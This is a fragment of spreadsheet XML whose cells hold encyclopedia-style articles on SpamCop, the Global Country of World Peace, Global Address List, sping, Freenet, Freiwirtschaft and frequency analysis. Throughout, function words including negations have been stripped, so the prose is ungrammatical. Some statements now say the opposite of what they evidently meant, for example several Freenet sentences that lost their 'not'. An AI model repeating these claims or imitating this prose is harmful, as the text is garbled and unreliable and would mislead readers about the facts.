    <t>spamcop email spam reporting service, allowing recipients unsolicited bulk commercial email report addresses found spamcop's analysis senders spam abuse reporting addresses addresses. spamcop uses reports compile list computers sending spam called "spamcop blocking list" "spamcop blacklist" (scbl). history spamcop founded julian haight 1998 individual effort. reporting service became popular, staff added scbl became useful. commonly target ddos attacks lawsuits organizations listed scbl. email security company ironport systems announced acquisition spamcop november 2003, remained independently julian haight. small staff volunteer help forum. ironport agreed become division cisco systems january 2007, effectively making spamcop cisco service. julian haight left approximately years cisco acquisition.spamcop views attempt stop spam without necessity governmental intervention, lacks power government large isp, greater difficulty dealing spammers' expertise well large networks control used cripple blue security massive ddos attack.spamcop previously provided paid email accounts corporate email services (ces). august 2014, email email account holders, announced "[a]s september 2014 (tuesday) current spamcop email service converted email forwarding-only spam filtered spamcop existing spamcop email users" "spamcop longer provide imap service [after date]."as january 2021 10:31:56 utc, domain sub-domains spamcop.net resolved domain parking service domain expired. later domain renewed service running. outage resulted messages rejected blacklist entries directing domain parking service. benefits spamcop effective helping isps, hosts email providers identify accounts abused shut spammer finishes operations. spamcop provides information reports third parties also working fight spam, amplifying impact services beyond reach. limitations first-time spamcop reporters, spamcop parsing reporting service requires reporter manually verify submission spam destinations spam reports correct. people tools automatically report spam, report email spam, report wrong people fined banned. this verification requires extra time effort. despite steps, reports innocent bystanders happen isps need configure spamcop send reports want again. also anti-spam techniques reporting spam blue frog comparison blacklists e-mail spam list poisoning network abuse clearinghouse spade (software) spam (electronic) spamhaus project references external links spamcop official site (note: there copycat sites similar urls tlds.) spamcop forums newsgroups scbl dispute resolution surbl based spamcop data block spam based uris contained within message body.</t>
  </si>
  <si>
    <t>Global Country of World Peace</t>
  </si>
  <si>
    <t>global country world peace (gcwp) non-profit organization claims promote transcendental meditation, education, construction "buildings peace" world's major cities. inaugurated maharishi mahesh yogi, founder transcendental meditation, october 2000, gcwp originally conceived country without borders peace-loving people everywhere." issued currency called "raam" leader neurologist tony nader.in 2002, gcwp incorporated state iowa, headquarters maharishi vedic city. administrative educational centres u.s., netherlands ireland. mission according report bloomberg, gcwp's filings describe mission creation world peace unifying nations happiness prosperity, invincibility, perfect health'. mission us-based division gcwp, according 2005 article, promote "enlightenment, good health, peace practice transcendental meditation" build palaces peace 3000 world's major cities. currency raam bearer bond local currency issued global country world peace. designed development agricultural projects combat poverty third world countries. 2003, limited acceptance european u.s. cities. currency used iowa also given approval netherlands dutch shops, department store chains, villages cities, using notes fixed rate euros raam.the raam issued denominations raam, raam equal euros europe, raam equal dollars u.s. raam notes printed joh. enschedé. 2002, maharishi vedic city mayor wynne estimated $40,000 worth raam circulation. raam differs complementary currencies focus export products rather improving local circulation benefit lives local people. according minister finance global country world peace, raam "could used" agricultural projects developing nations. cato institute currency expert james dorn expressed doubt viability plan, suggesting economic approaches would better establish network collective farms. according issuer, raam also bearer bond earns total interest five years (0.6% simple interest annually).the raam used, 2003, alongside euros accordance dutch shops netherlands. raam convertible netherlands fortis bank roermond. 2003, dutch central bank estimated approximately 100,000 raam notes circulation. also limited acceptance iowan cities called maharishi vedic city fairfield. according maharishi global financing, agreements made 2004 farmers' association south america traditional leaders africa start using raam agricultural development projects. administrative centers maharishi vedic city "capital global country world peace." city's plan building code follow principles vedic architecture. architecture professor keller easterling says maharishi vedic city reflects gcwp's interest achieving "benign form global sovereignty".from 2004 2010 gcwp owned american bank note company building york city, called financial capital gcwp. intended administrative center project raise funds 3,000 peace palaces, hospitals, organic farms, clinics developing countries, time, primary transcendental meditation center. when building became financial burden sold 2010 organization's $5.5 million profit earmarked manhattan teaching center programs.the peace government" announced plans build national capital near smith center, kansas washington township, smith county. ceremony held march 2006. over 1,000 acres (4.0 km2) eventually purchased. plans called construction buildings, including peace palaces broadcast center, estimated cost million. plans divided community. nine pastors wrote local newspaper concerns souls area residents chamber commerce looked forward creation jobs. county planning commission placed moratorium changes land effort prevent agricultural land capital, withdrew movement threatened federal court. april 2009, spokesman announced peace palaces nearing completion.in 2009 gcwp opened west virginia retreat center three churches, west virginia, usa. male-only facility used weekend retreats well residences want spend years living simpler life involving meditation. 2012, center consisted buildings male residents plus various staff. larger plans include development acres (0.71 km2), purchased cost $750,000 "environmentally friendly retreat" include rooms professional amateur meditators, according project director, raja lopinto. peace palaces 2008, global country world peace undertook construction "peace palaces" major cities, would teach courses transcendental meditation technique offer ayurvedic treatments herbal food supplements. buildings, built according vedic guidelines, planned two-story, white, buildings 10,000 12,000 square feet (1,100 intended replacements rented spaces used "more locations" across u.s.a. their appearance described "indian temple crossed southern plantation mansion" intended "visual brand" organization.peace palaces completed u.s. cities bethesda, maryland, houston austin, texas, fairfield, iowa, paul, minnesota lexington, kentucky. three existing peace palaces built private individuals. land purchased locations around others built around world.according officials organization, zoning related issues slowed progress building least cities land purchased. 2007 "maharishi’s organization" took legal action city mayfield heights, ohio, city refused setback variance proposed peace palace. although "admired finances" critics call project "maharishi's followers" create funds land group's treasury. other facilities 2005, global country bought 800-plus acres farm goshen, york, million cash, plans create organic farm training site, well peace palace. according broker steve perfit, acres (3.31 km2) sale april 2009.also 2005, global country world peace purchased 27-acre (110,000 prairie peace park pleasant dale, nebraska. gcwp planned build 12,000-square-foot (1,100 "peace palace" site. article august 2010 journal star reported property sale $95,000.in 2006, global country purchased inishraher, 30-acre (120,000 island clew coast ireland intention founding international peace centre, designating maharishi capital global country world peace. planning permission 18-room hostels island approved july 2009. efforts obtain sovereignty 2001, reported global country world peace unsuccessful attempts establish sovereign nation contacting countries africa, asia, latin america. november 2000, gcwp made proposal president suriname, offering $1.3 billion three years 200-year lease 3,500 acres km2) rural land plus percent money sovereign state's central bank puts circulation" creation 10,000 jobs. unhcr reported that, july 2001, island nation tuvalu rejected, serious consideration, proposal gcwp create "vatican like sovereign city-state" near international airport exchange payment million year.in 2002, gcwp asked could world headquarters hundred acres land 33-square-mile km2) island rota part commonwealth northern mariana islands, commonwealth united states. gcwp offered contribute economic growth country rota declined, preferring remain part commonwealth. costa rica, officials gcwp "allegedly offered family" talamanca reservation, $250 month right appoint king. ceremony held talamanca reservation appoint local indian king community. perceiving gcwp's actions efforts establish independent state security minister ordered gcwp representative leave country. administration regional leaders 'leading transcendental meditators "trained teachers graduates tm-sidhi program called "governors enlightenment". tony nader appointed maharishi "first sovereign ruler global country world peace" 2000.some "national leaders" "top officials" global country world peace called rajas. 2005, male rajas appointed maharishi national regional leaders organization. raja training course took months participants "advised make contribution $1,000,000 maharishi world peace fund." ceremonial attire maharaja rajas includes white silk robes, gold medallions, gold crowns. 2008, nader attended maharishi's funeral india adopted title, "maharaja adhiraj rajaraam". since organization also administrated "high-functioning intellectual elite upper echelons," bevan morris, maureen wynne, willy koppel, retaining nader central leader.the gcwp, according website, “ministry” consisting ministers split twelve departments: order, education, health, architecture, trade commerce, defence, science technology, communication, religion culture, administration, finance planning. references external links official site peace government archived april 2011 wayback machine</t>
  </si>
  <si>
    <t>Global Address List</t>
  </si>
  <si>
    <t>global address list (gal) electronic shared address book contains usually people given organization (company, school etc.). this address book accessed computer network using ldap protocol, carddav electronic means. usually read-only users. only administrators update items. users search look people (employees, students, members, etc.) obtain information email address, phone number, work position office location. common usage user writing email, knows recipient's name know email address. application, email client (e.g. sogo, zimbra thunderbird) look email address user written part recipient's name. certificates encryption ldap directory used also distribution user certificates (x.509, openpgp). user query contact information also digital certificate users order send e.g. encrypted e-mails. references sogo documentation 4523 ldap schema definitions x.509 certificates publishing digital certificates ldap ejbca features publish certificates ldap</t>
  </si>
  <si>
    <t>Sping</t>
  </si>
  <si>
    <t>sping short "spam ping", related pings blogs using trackbacks, called trackback spam. pings messages sent blog publishing tools centralized network service ping server) providing notification newly published posts content. spings, ping spam, pings sent spam blogs, sometimes multiple pings short interval legitimate source, often tens hundreds minute, misconfigured software, wish make content coming source appear fresh. spings, like spam blogs, increasingly problematic blogging community. estimates weblogs.com matt mullenweg's ping-o-matic! service sping rate—the percentage pings sent spam blogs—well 50%. study commissioned ebiquity group conducted university maryland 2006 confirmed numbers around 75%. since then, growth sping slowed portion pings spam dropped 53%.the term popularized david sifry technorati february 2006 state blogosphere report, coined initially september 2005 french blogger, sébastien billiard, article titled "spam 2.0". also spam blogs referrer spam references external links blogs grow, does spam, christopher heun, internet week, april 2006</t>
  </si>
  <si>
    <t>Freenet</t>
  </si>
  <si>
    <t>freenet peer-to-peer platform censorship-resistant, anonymous communication. uses decentralized distributed data store keep deliver information, suite free software publishing communicating without fear censorship.: both freenet associated tools originally designed clarke, defined freenet's goal providing freedom speech internet strong anonymity protection.the distributed data store freenet used many third-party programs plugins provide microblogging media sharing, anonymous decentralised version tracking, blogging, generic trust decentralized spam resistance, shoeshop using freenet sneakernet, many more. history origin freenet traced clarke's student project university edinburgh, completed graduation requirement summer 1999. clarke's resulting unpublished report distributed decentralized information storage retrieval system" (1999) provided foundation seminal paper written collaboration researchers, "freenet: distributed anonymous information storage retrieval system" (2001). according citeseer, became frequently cited computer science articles 2002.freenet provide anonymity internet storing small encrypted snippets content distributed computers users connecting intermediate computers pass requests content sending back without knowing contents full file, similar routers internet route packets without knowing anything files—except freenet caching, layer strong encryption, reliance centralized structures. this allows users publish anonymously retrieve various kinds information.: freenet continuous development since 2000. freenet 0.7, released 2008, major re-write incorporating number fundamental changes. fundamental change support darknet operation. version offered modes operation: mode connects friends, opennet-mode connects freenet user. both modes simultaneously. when user switches pure darknet operation, freenet becomes difficult detect outside. transport layer created darknet mode allows communication restricted routes commonly found mesh networks, long connections follow small-world structure.: 815–816 other modifications include switching udp, allows hole punching along faster transmission messages peers network.freenet 0.7.5, released june 2009, offers variety improvements 0.7. these include reduced memory usage, faster insert retrieval content, significant improvements fproxy interface used browsing freesites, large number smaller bugfixes, performance enhancements, usability improvements. version 0.7.5 also shipped version windows installer.as build 1226, released july 2009, features written include significant security improvements attackers acting network physical seizure computer running node.as build 1468, released july 2015, freenet core stopped using db4o database laid foundation efficient interface trust plugin provides spam resistance.freenet always free software, 2011 required users install java. this problem solved making freenet compatible openjdk, free open source implementation java platform. february 2015, freenet received suma-award "protection total surveillance". features user interface freenet served model japanese peer peer file-sharing programs winny, share perfect dark, model differs networks bittorrent emule. freenet separates underlying network structure protocol users interact network; result, variety ways access content freenet network. simplest fproxy, integrated node software provides interface content network. using fproxy, user browse freesites (websites normal html related tools, whose content stored within freenet rather traditional server). interface also used configuration node management tasks. through separate applications plugins loaded node software, users interact network ways, forums similar forums usenet interfaces similar traditional "filesharing" interfaces. while freenet provides http interface browsing freesites, proxy world wide web; freenet used access content previously inserted freenet network. way, similar tor's onion services anonymous proxy software like tor's proxy. freenet's focus lies free speech anonymity. because that, freenet acts differently certain points (directly indirectly) related anonymity part. freenet attempts protect anonymity people inserting data network (uploading) retrieving data network (downloading). unlike file sharing systems, need uploader remain network uploading file group files. instead, upload process, files broken chunks stored variety computers network. when downloading, chunks found reassembled. every node freenet network contributes storage space hold files bandwidth uses route requests peers. direct result anonymity requirements, node requesting content normally connect directly node instead, request routed across several intermediaries, none know node made request result, total bandwidth required network transfer file higher systems, result slower transfers, especially infrequently accessed content. since version 0.7, freenet offers different levels security: opennet darknet. with opennet, users connect arbitrary users. with darknet, users connect "friends" previously exchanged public keys, named node-references. both modes used together. content freenet's founders argue true freedom speech comes true anonymity beneficial uses freenet outweigh negative uses. their view free speech, itself, contradiction consideration—the information crime. freenet attempts remove possibility group imposing beliefs values data. although many states censor communications different extents, share commonality body must decide information censor information allow. what acceptable group people considered offensive even dangerous another. essence, purpose freenet ensure allowed decide acceptable. reports freenet's authoritarian nations difficult track nature freenet's goals. group, freenet china, used introduce freenet software chinese users starting 2001 distribute within china e-mails disks group's website blocked chinese authorities mainland. reported 2002 freenet china several thousand dedicated users.: 70–71 however, freenet opennet traffic blocked china around 2010s. technical design freenet file sharing network stores documents allows retrieved later associated key, possible protocols http. network designed highly survivable. system central servers subject control individual organization, including designers freenet. codebase size 192.000 lines code. information stored freenet distributed around network stored several different nodes. encryption data relaying requests makes difficult determine inserted content freenet, requested content, content stored. this protects anonymity participants, also makes difficult censor specific content. content stored encrypted, making difficult even operator node determine stored node. this provides plausible deniability; which, combination request relaying, means safe harbor laws protect service providers also protect freenet node operators. when asked topic, freenet developers defer discussion says able filter anything safe choice. distributed storage caching data like winny, share perfect dark, freenet transmits data nodes actually stores them, working huge distributed cache. achieve this, node allocates amount disk space store data; configurable node operator, typically several more). files freenet typically split multiple small blocks, duplicate blocks created provide redundancy. each block handled independently, meaning single file parts stored many different nodes. information flow freenet different networks like emule bittorrent; freenet: user wishing share file update freesite "inserts" file network" after "insertion" finished, publishing node free shut down, file stored network. remain available users whether original publishing node online. single node responsible content; instead, replicated many different nodes.two advantages design high reliability anonymity. information remains available even publisher node goes offline, anonymously spread many hosting nodes encrypted blocks, entire files. disadvantage storage method node responsible chunk data. piece data retrieved time node keeps getting data, drop data sometime allocated disk space fully used. freenet tends 'forget' data retrieved regularly (see also effect). while users insert data network, delete data. freenet's anonymous nature original publishing node owner piece data unknown. data removed users request network typically, host computer network runs software acts node, connects hosts running software form large distributed, variable-size network peer nodes. some nodes user nodes, documents requested presented human users. other nodes serve route data. nodes communicate identically dedicated "clients" "servers". possible node rate another node except capacity insert fetch data associated key. this unlike networks node administrators employ ratio system, users share certain amount content download. freenet also considered small world network. freenet protocol intended used network complex topology, internet (internet protocol). each node knows number nodes reach directly (its conceptual "neighbors"), node neighbor other; hierarchy structure intended. each message routed network passing neighbor neighbor reaches destination. node passes message neighbor, know whether neighbor forward message another node, final destination original source message. this intended protect anonymity users publishers. each node maintains data store containing documents associated keys, routing table associating nodes records performance retrieving different keys. protocol freenet protocol uses key-based routing protocol, similar distributed hash tables. routing algorithm changed significantly version 0.7. prior version 0.7, freenet used heuristic routing algorithm node fixed location, routing based node served closest fetched version 0.3) estimated serve faster version 0.5). either case, connections sometimes added downstream nodes (i.e. node answered request) requests succeeded, nodes discarded least recently used order something close it). oskar sandberg's research (during development version 0.7) shows "path folding" critical, simple routing algorithm suffice provided path folding. disadvantage easy attacker find freenet nodes, connect them, every node continually attempting find connections. version 0.7, freenet supports "opennet" (similar algorithms, simpler), "darknet" (all node connections manually, friends know node's address). darknet less convenient, much secure distant attacker. this change required major changes routing algorithm. every node location, number when requested, first node checks local data store. found, key's hash turned another number range, request routed node whose location closest key. this goes number hops exceeded, nodes search, data found. data found, cached node along path. source node key, attempting find currently stored result cached widely. essentially process used insert document network: data routed according runs hops, existing document found key, stored node. older data found, older data propagated returned originator, insert "collides". works locations clustered right way. freenet assumes darknet subset global social network) small-world network, nodes constantly attempt swap locations (using metropolis–hastings algorithm) order minimize distance neighbors. network actually small-world network, freenet find data reasonably quickly; ideally order {\displaystyle o\left(\left[log\left(n\right)\right]^{2}\right)} hops notation. however, guarantee data found all.eventually, either document found limit exceeded. terminal node sends reply makes back originator along route specified intermediate nodes' records pending requests. intermediate nodes choose cache document along way. besides saving bandwidth, also makes documents harder censor "source node". effect initially, locations darknet distributed randomly. this means routing requests essentially random. opennet connections established join request provides optimized network structure existing network already optimized. data newly started freenet distributed somewhat randomly.as location swapping darknet) path folding opennet) progress, nodes close another increasingly close locations, nodes away distant locations. data similar keys stored node.the result network self-organize distributed, clustered structure nodes tend hold data items close together space. there probably multiple clusters throughout network, given document replicated numerous times, depending much used. this kind "spontaneous symmetry breaking", initially symmetric state (all nodes same, random initial keys other) leads highly asymmetric situation, nodes coming specialize data closely related keys.there forces tend cause clustering (shared closeness data spreads throughout network), forces tend break clusters (local caching commonly used data). these forces different depending often data used, seldom-used data tend nodes specialize providing data, frequently used items spread widely throughout network. this automatic mirroring counteracts times traffic becomes overloaded, mature network's intelligent routing, network size require log(n) time retrieve document average. keys keys hashes: notion semantic closeness speaking closeness. therefore, correlation closeness similar popularity data might keys exhibit semantic meaning, thus avoiding bottlenecks caused popular subjects. there main varieties keys freenet, content hash (chk) signed subspace (ssk). subtype ssks updatable subspace (usk) adds versioning allow secure updating content. sha-256 hash document (after encryption, depends hash plaintext) thus node check document returned correct hashing checking digest key. this contains meat data freenet. carries binary data building blocks content delivered client reassembly decryption. unique nature provides tamperproof content. hostile node altering data immediately detected next node client. chks also reduce redundancy data since data multiple sites reference large files, reference chk.ssks based public-key cryptography. currently freenet uses algorithm. documents inserted ssks signed inserter, signature verified every node ensure data tampered with. ssks used establish verifiable pseudonymous identity freenet, allow multiple documents inserted securely single person. files inserted effectively immutable, since inserting second file name cause collisions. usks resolve adding version number keys also used providing update notification keys registered bookmarks interface. another subtype keyword signed key, ksk, pair generated standard simple human-readable string. inserting document using allows document retrieved decrypted requester knows human-readable string; allows convenient (but less secure) uris users refer scalability network said scalable performance deteriorate even network large. scalability freenet evaluated, similar architectures shown scale logarithmically. this work indicates freenet find data {\displaystyle o(\log ^{2}n)} hops small-world network (which includes opennet darknet style freenet networks), ignoring caching could improve scalability popular content. however, scalability difficult test without large network. furthermore, security features inherent freenet make detailed performance analysis (including things simple determining size network) difficult accurately. now, scalability freenet tested. darknet versus opennet version 0.7, freenet supports "darknet" "opennet" connections. opennet connections made automatically nodes opennet enabled, darknet connections manually established users know trust other. freenet developers describe trust needed "will crack freenet node". opennet connections easy use, darknet connections secure attackers network, make difficult attacker (such oppressive government) even determine user running freenet first place.the core innovation freenet allow globally scalable darknet, capable least theory) supporting millions users. previous darknets, waste, limited relatively small disconnected networks. scalability freenet made possible fact human relationships tend form small-world networks, property exploited find short paths people. work based speech given clarke swedish mathematician oskar sandberg. furthermore, routing algorithm capable routing mixture opennet darknet connections, allowing people friends using network performance sufficient connections still receiving security benefits darknet connections. this also means small darknets users also opennet connections fully integrated whole freenet network, allowing users access content, whether opennet, darknet, hybrid two, except darknet pockets connected single hybrid node. tools applications unlike many applications freenet provide comprehensive functionality itself. freenet modular features called freenet client protocol (fcp) programs implement services message boards, file sharing, online chat. communication freenet messaging system (fms) designed address problems frost denial service attacks spam. users publish trust lists, user downloads messages identities trust identities trusted identities trust. developed anonymously downloaded freesite within freenet. official site normal internet. features random post delay, support many identities, distinction trusting user's posts trusting trust list. written separate application freenet uses freenet client protocol (fcp) interface freenet.frost frost includes support convenient file sharing, design inherently vulnerable spam denial service attacks. frost downloaded frost home page sourceforge, frost freesite within freenet. endorsed freenet developers. frost written java separate application freenet.sone sone provides simpler interface inspired facebook public anonymous discussions image galleries. provides control programs also used implement comment system static websites regular internet. utilities jsite jsite tool upload websites. handles keys manages uploading files.infocalypse infocalypse extension distributed revision control system mercurial. uses optimized structure minimize number requests retrieve data, allows supporting repository securely reuploading parts data without requiring owner's private keys. libraries fcplib fcplib (freenet client protocol library) aims cross-platform natively compiled c++-based functions storing retrieving information freenet. fcplib supports windows nt/2k/xp, debian, bsd, solaris, macos.lib-pyfreenet lib-pyfreenet exposes freenet functionality python programs. infocalypse uses vulnerabilities enforcement agencies claimed successfully infiltrated freenet opennet order deanonymize users technical details given support allegations. report stated that, child-porn investigation focused [the suspect] authorities monitoring online network, freenet." different report indicated arrests based blackice project leaks, debunked using math using incorrectly calculated false positives rate false model.a court case peel region ontario, canada owen, 2017 oncj (canlii), illustrated enforcement fact presence, peel regional police located downloading illegal material freenet network. court decision indicates canadian enforcement agency operates nodes running modified freenet software hope determining requesting illegal material. routing table insertion (rti) attack notability freenet significant publicity mainstream press, including articles york times, coverage cnn, minutes bbc, guardian, elsewhere. freenet received suma-award 2014 "protection total surveillance". freesite "freesite" site hosted freenet network. because contains static content, cannot contain active content like server-side scripts databases. freesites coded html support many features browser viewing page allows; however, exceptions freenet software remove parts code used reveal identity person viewing page (making page access something internet, example). also peer-to-peer hosting rendezvous protocol anonymous crypto-anarchism cypherpunk distributed file system freedom information friend-to-friend comparable software gnunet interplanetary file system java anon proxy (also known jondonym) osiris perfect dark also creates distributed data store shared anonymous nodes; successor share, successor winny tahoe-lafs zeronet references further reading clarke, miller, s.g.; hong, t.w.; sandberg, wiley, (2002). "protecting free expression online freenet" (pdf). ieee internet computing. (1): 40–9. citeseerx 10.1.1.21.9143. doi:10.1109/4236.978368. krogh, georg; spaeth, sebastian; lakhani, karim (2003). "community, joining, specialization open source software innovation: case study" (pdf). research policy. (7): 1217–41. doi:10.1016/s0048-7333(03)00050-7. dingledine, roger; freedman, michael molnar, david (2001). "the free haven project: distributed anonymous storage service". designing privacy enhancing technologies. lecture notes computer science. 67–95. citeseerx 10.1.1.420.478. doi:10.1007/3-540-44702-4_5. isbn 978-3-540-41724-8. clarke, ian; sandberg, oskar; wiley, brandon; hong, theodore (2001). "freenet: distributed anonymous information storage retrieval system". designing privacy enhancing technologies. lecture notes computer science. 46–66. citeseerx 10.1.1.26.4923. doi:10.1007/3-540-44702-4_4. isbn 978-3-540-41724-8. riehl, damien (2000). "peer-to-peer distribution systems: will napster, gnutella, freenet create copyright nirvana gehenna?". william mitchell review. (3): 1761. roemer, ryan (fall 2002). "the digital evolution: freenet future copyright internet". ucla journal technology. sun, xiaoqing; liu, baoxu; feng, dengguo (2005). "analysis next generation routing freenet". computer engineering (17): 126–8. zhang; goel, ashish; govindan, ramesh (2002). "using small-world model improve freenet performance". infocom 2002: twenty-first annual joint conference ieee computer communications societies. vol. 1228–37. citeseerx 10.1.1.74.7011. doi:10.1109/infcom.2002.1019373. isbn 978-0-7803-7476-8. s2cid 13182323. external links official website</t>
  </si>
  <si>
    <t>Freiwirtschaft</t>
  </si>
  <si>
    <t>freiwirtschaft (german "free economy") economic idea founded silvio gesell 1916. called natürliche wirtschaftsordnung (natural economic order). 1932, group swiss businessmen used ideas found bank (wir). structure freiwirtschaft consists three central aspects, usually summed three freigeld (free money) money issued limited period constant value (neither inflation, deflation). long-term saving requires investment bonds stocks. freiland (free land) land commonly owned else property public institutions rented community government, respectively, purchased (see also georgism). freihandel (free trade) history basic economic ideas freiwirtschaft published 1890 hungarian-austrian economist theodor hertzka novel freiland soziales zukunftsbild (freeland social anticipation). flaws monetary system freiwirtschaft claims current monetary systems flawed. mainstream economics, prices convey information. example, dropping prices product mean less demand supply product. this leads buyer buying more, seller/producer starting sell/produce something else, thereby reducing supply product. reaction, assuming constant desirability, price product rises again. price, together market participants, builds feedback loop around stable, "ideal" price. stable price, market ideal, pays much earns little, tendencies either party change price. "wobbling" around ideal price called self-stabilizing. error current system, according gesell, ill-transported information price. money nothing claim goods services, usable economies accept money exchange former. weak economy, money worth less goods. instead inflation, result deflation described above, less money goods. this feedback loop self-destabilizing, according freiwirtschaft theory. references sources helmut creutz, money syndrome towards market economy free crises, upfront publishing 2010. günter bartsch, nwo-bewegung silvio gesells geschichtlicher grundriß 1891-1992/93. gauke, lütjenburg 1994. knulp goeke, verteilungspolitische problematik freiwirtschaftslehre. cologne 1961. johannes heinrichs, sprung teufelskreis. sozialethische wirtschaftstheorie vol. munich 2005. hans-joachim werner, geschichte freiwirtschaftsbewegung. jahre kampf eine marktwirtschaft ohne kapitalismus. waxmann, münster 1990. external links introduction freiwirtschaft materialien geld-, zins- schuldenproblematik german, partly english) fairconomy german, partly english)</t>
  </si>
  <si>
    <t>Frequency analysis</t>
  </si>
  <si>
    <t>cryptanalysis, frequency analysis (also known counting letters) study frequency letters groups letters ciphertext. method used breaking classical ciphers. frequency analysis based fact that, given stretch written language, certain letters combinations letters occur varying frequencies. moreover, characteristic distribution letters roughly almost samples language. instance, given section english language, common, rare. likewise, common pairs letters (termed bigrams digraphs), common repeats. nonsense phrase "etaoin shrdlu" represents frequent letters typical english language text. ciphers, properties natural language plaintext preserved ciphertext, patterns potential exploited ciphertext-only attack. frequency analysis simple substitution ciphers simple substitution cipher, letter plaintext replaced another, particular letter plaintext always transformed letter ciphertext. instance, occurrences letter turn letter ciphertext message containing numerous instances letter would suggest cryptanalyst represents basic frequency analysis first count frequency ciphertext letters associate guessed plaintext letters them. more ciphertext anything else suggests corresponds plaintext, certain; also common english, might either also. unlikely plaintext less common. thus cryptanalyst need several combinations mappings ciphertext plaintext letters. more complex statistics conceived, considering counts pairs letters (bigrams), triplets (trigrams), this done provide information cryptanalyst, instance, nearly always occur together order english, even though rare. example suppose intercepted cryptogram below, known encrypted using simple substitution cipher follows: livitcswpiyvewhevsriqmxleyveoiewhrxexipfemvewhkvstylxzixlikiixpijvszeyperrgerim wqlmglmxqeriwgpsrihmxqerekietxmjtprgevekeitrewhexxlexxmzitwawsqwxswextvepmrxrsj gstvrieyviexcvmuimwergmiwxmjmgcsmwxsjomiqxliviqivixqsvstwhkpegarcsxrwievswiibxv izmxfsjxlikegaewhepswyswiwievxlisxlivxlirgepirqiviibgiihmwypflevhewhypsrrfqmxle ppxlieccievewgisjktvwmrlihysphxliqimylxsjxlimwrigxqeroivfvizevaekpiewhxeamwyepp xlmwyrmwxsgswrmhivexmswmgstphlevhpfkpezintcmxivjsvlmrscmwmswvircigxmwymx example, uppercase letters used denote ciphertext, lowercase letters used denote plaintext guesses such), used express guess ciphertext letter represents plaintext letter could frequency analysis help solve message along following lines: counts letters cryptogram show common single letter, common bigram, common trigram. common letter english language, common bigram, common trigram. this strongly suggests x~t, i~e. second common letter cryptogram since first second frequent letters english language, accounted for, guesses e~a, third frequent letter. tentatively making assumptions, following partial decrypted message obtained. hevetcswpeyvawhavsreqmthayvaoeawhrtatepfamvawhkvstyhtzethekeetpejvszayparrgarem wqhmghmtqarewgpsrehmtqarakeattmjtprgavakaetrawhatthattmzetwawsqwtswattvapmrtrsj gstvreayveatcvmuemwargmewtmjmgcsmwtsjomeqtheveqevetqsvstwhkpagarcstrweavsweebtv ezmtfsjthekagaawhapswysweweavthesthevthergaperqeveebgeehmwypfhavhawhypsrrfqmtha pptheacceavawgesjktvwmrhehysphtheqemyhtsjthemwregtqaroevfvezavaakpeawhtaamwyapp thmwyrmwtsgswrmhevatmswmgstphhavhpfkpazentcmtevjsvhmrscmwmswvercegtmwymt using initial guesses, spot patterns confirm choices, "that". moreover, patterns suggest guesses. "rtate" might "state", would mean r~s. similarly "atthattmze" could guessed "atthattime", yielding z~m. furthermore, "heve" might "here", giving v~r. filling guesses, gets: heretcswpeyrawharsseqithayraoeawhstatepfairawhkrstyhtmethekeetpejrsmaypassgasei wqhighitqasewgpssehitqasakeattijtpsgarakaetsawhatthattimetwawsqwtswattrapistssj gstrseayreatcriueiwasgiewtijigcsiwtsjoieqthereqeretqsrstwhkpagascstswearsweebtr emitfsjthekagaawhapswyswewearthestherthesgapesqereebgeehiwypfharhawhypsssfqitha pptheaccearawgesjktrwishehysphtheqeiyhtsjtheiwsegtqasoerfremaraakpeawhtaaiwyapp thiwysiwtsgswsiheratiswigstphharhpfkpamentciterjsrhissciwiswrescegtiwyit turn, guesses suggest still others (for example, "remara" could "remark", implying a~k) relatively straightforward deduce rest letters, eventually yielding plaintext. hereuponlegrandarosewithagraveandstatelyairandbroughtmethebeetlefromaglasscasei nwhichitwasencloseditwasabeautifulscarabaeusandatthattimeunknowntonaturalistsof courseagreatprizeinascientificpointofviewthereweretworoundblackspotsnearoneextr emityofthebackandalongoneneartheotherthescaleswereexceedinglyhardandglossywitha lltheappearanceofburnishedgoldtheweightoftheinsectwasveryremarkableandtakingall thingsintoconsiderationicouldhardlyblamejupiterforhisopinionrespectingit point, would good idea insert spaces punctuation: hereupon legrand arose, grave stately air, brought beetle glass case enclosed. beautiful scarabaeus, and, time, unknown naturalists—of course great prize scientific point view. there round black spots near extremity back, long near other. scales exceedingly hard glossy, appearance burnished gold. weight insect remarkable, and, taking things consideration, could hardly blame jupiter opinion respecting example gold-bug, eve's guesses correct. this would always case, however; variation statistics individual plaintexts mean initial guesses incorrect. necessary backtrack incorrect guesses analyze available statistics much depth somewhat simplified justifications given example. also possible plaintext exhibit expected distribution letter frequencies. shorter messages likely show variation. also possible construct artificially skewed texts. example, entire novels written omit letter altogether form literature known lipogram. history usage first known recorded explanation frequency analysis (indeed, kind cryptanalysis) given century al-kindi, arab polymath, manuscript deciphering cryptographic messages. suggested close textual study qur'an first brought light arabic characteristic letter frequency. spread, similar systems widely used european states time renaissance. 1474, cicco simonetta written manual deciphering encryptions latin italian text.several schemes invented cryptographers defeat weakness simple substitution encryptions. these included: homophonic substitution: homophones several alternatives common letters otherwise monoalphabetic substitution ciphers. example, english, ciphertext might mean plaintext polyalphabetic substitution, several alphabets chosen assorted, less devious, ways (leone alberti seems first propose this); polygraphic substitution, schemes pairs triplets plaintext letters treated units substitution, rather single letters, example, playfair cipher invented charles wheatstone mid-19th century.a disadvantage attempts defeat frequency counting attacks increases complication enciphering deciphering, leading mistakes. famously, british foreign secretary said rejected playfair cipher because, even school boys could cope successfully wheatstone playfair shown, "our attachés could never learn it!". rotor machines first half 20th century (for example, enigma machine) essentially immune straightforward frequency analysis. however, kinds analysis ("attacks") successfully decoded messages machines. frequency analysis requires basic understanding statistics plaintext language problem solving skills, and, performed hand, tolerance extensive letter bookkeeping. during world (wwii), british americans recruited codebreakers placing crossword puzzles major newspapers running contests could solve fastest. several ciphers used axis powers breakable using frequency analysis, example, consular ciphers used japanese. mechanical methods letter counting statistical analysis (generally card type machinery) first used world possibly army's sis. today, hard work letter counting analysis replaced computer software, carry analysis seconds. with modern computing power, classical ciphers unlikely provide real protection confidential data. frequency analysis fiction frequency analysis described fiction. edgar allan poe's "the gold-bug", arthur conan doyle's sherlock holmes tale "the adventure dancing men" examples stories describe frequency analysis attack simple substitution ciphers. cipher story encrusted several deception measures, literary device anything significant cryptographically. also etaoin shrdlu letter frequencies arabic letter frequency index coincidence topics cryptography zipf's void, novel georges perec. original french text written without letter english translation. spanish version contains gadsby (novel), novel ernest vincent wright. novel written lipogram, include words contain letter further reading helen fouché gaines, "cryptanalysis", 1939, dover. isbn 0-486-20097-3 abraham sinkov, "elementary cryptanalysis: mathematical approach", mathematical association america, 1966. isbn 0-88385-622-0. 